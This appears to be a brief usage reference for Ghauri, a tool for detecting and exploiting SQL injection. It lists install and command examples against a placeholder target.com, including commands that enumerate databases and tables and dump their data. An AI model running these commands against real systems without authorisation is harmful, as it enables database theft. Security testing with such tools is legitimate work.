Ghauri

Advanced SQL injection detection tool

Description

Ghauri is an advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws. It has improved detection capabilities compared to some older tools and supports various injection techniques.

Installation

BASH
pip install ghauri

Basic Usage

BASH
# Basic test
ghauri -u "https://target.com/?id=1"

# POST request
ghauri -u "https://target.com" --data "param=value"

Advanced Usage

BASH
# Enumerate databases
ghauri -u "https://target.com/?id=1" --dbs

# Enumerate tables
ghauri -u "https://target.com/?id=1" -D database --tables

# Dump data
ghauri -u "https://target.com/?id=1" -D database -T table --dump

# Set technique
ghauri -u "https://target.com/?id=1" --technique BEU

# With proxy
ghauri -u "https://target.com/?id=1" --proxy http://127.0.0.1:8080

# Batch mode
ghauri -u "https://target.com/?id=1" --batch